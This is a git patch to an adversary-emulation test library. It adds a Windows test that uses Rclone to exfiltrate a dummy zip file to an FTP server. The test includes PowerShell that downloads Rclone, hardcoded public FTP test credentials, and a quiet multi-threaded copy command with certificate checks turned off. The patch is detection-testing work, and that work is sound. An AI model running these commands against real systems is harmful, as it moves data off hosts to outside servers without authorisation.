From a69e08e6ae1eaaccd50f72fb0fadd51aed1f49c9 Mon Sep 17 00:00:00 2001
From: BlueTeamOps <1480956+blueteam0ps@users.noreply.github.com>
Date: Tue, 1 Nov 2022 05:58:24 +1100
Subject: [PATCH] Updated T1048.003 to include Rclone (#2202)

* Updated T1048.003 to include Rclone Added the use of Rclone to exfiltrate data to an external FTP server.
* Updated the test as discussed.
* Fixed the typo
Co-authored-by: Carrie Roberts
---
atomics/T1048.003/T1048.003.yaml | 46 ++++++++++++++++++++++++++++++++
1 file changed, 46 insertions(+)
diff --git a/atomics/T1048.003/T1048.003.yaml b/atomics/T1048.003/T1048.003.yaml
index ddad909c..d0b3b12f 100644
--- a/atomics/T1048.003/T1048.003.yaml
+++ b/atomics/T1048.003/T1048.003.yaml
@@ -159,3 +159,49 @@ atomic_tests:
 $ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile
 $ftp_del.GetResponse()}} catch{}
 name: powershell
+- name: Exfiltration Over Alternative Protocol - FTP - Rclone
+ auto_generated_guid: b854eb97-bf9b-45ab-a1b5-b94e4880c56b
+ description: |-
+ Rclone may be used by an adversary to exfiltrate data to a publicly hosted FTP server.
+ [Reference](https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/)
+ supported_platforms:
+ - windows
+ input_arguments:
+ ftp_server:
+ description: Your own ftp server
+ type: string
+ default: ftp.dlptest.com
+ ftp_pass:
+ description: Your FTP user's password
+ type: string
+ default: rNrKYTX9g7z3RgJRmxWuGHbeu
+ ftp_user:
+ description: Your FTP username
+ type: string
+ default: dlpuser
+ ftp_port:
+ description: Your FTP's port
+ type: string
+ default: 21
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ Check if the exfil package exists
+ prereq_command: |
+ if (Test-Path C:\Users\Public\Downloads\exfil.zip) {exit 0} else {exit 1}
+ get_prereq_command: |
+ fsutil file createnew C:\Users\Public\Downloads\exfil.zip 20485760
+ - description: 'Check if rclone zip exists'
+ prereq_command: |
+ if (Test-Path C:\Users\Public\Downloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "C:\Users\Public\Downloads\rclone-current-windows-amd64.zip"
+ Expand-Archive C:\Users\Public\Downloads\rclone-current-windows-amd64.zip -DestinationPath C:\Users\Public\Downloads\
+ executor:
+ command: |-
+ $rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
+ $exfil_pack = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "exfil.zip" | Select-Object -ExpandProperty FullName
+ &$rclone_bin config create ftpserver "ftp" "host" #{ftp_server} "port" #{ftp_port} "user" #{ftp_user} "pass" #{ftp_pass}
+ &$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate
+ name: powershell
+ elevation_required: true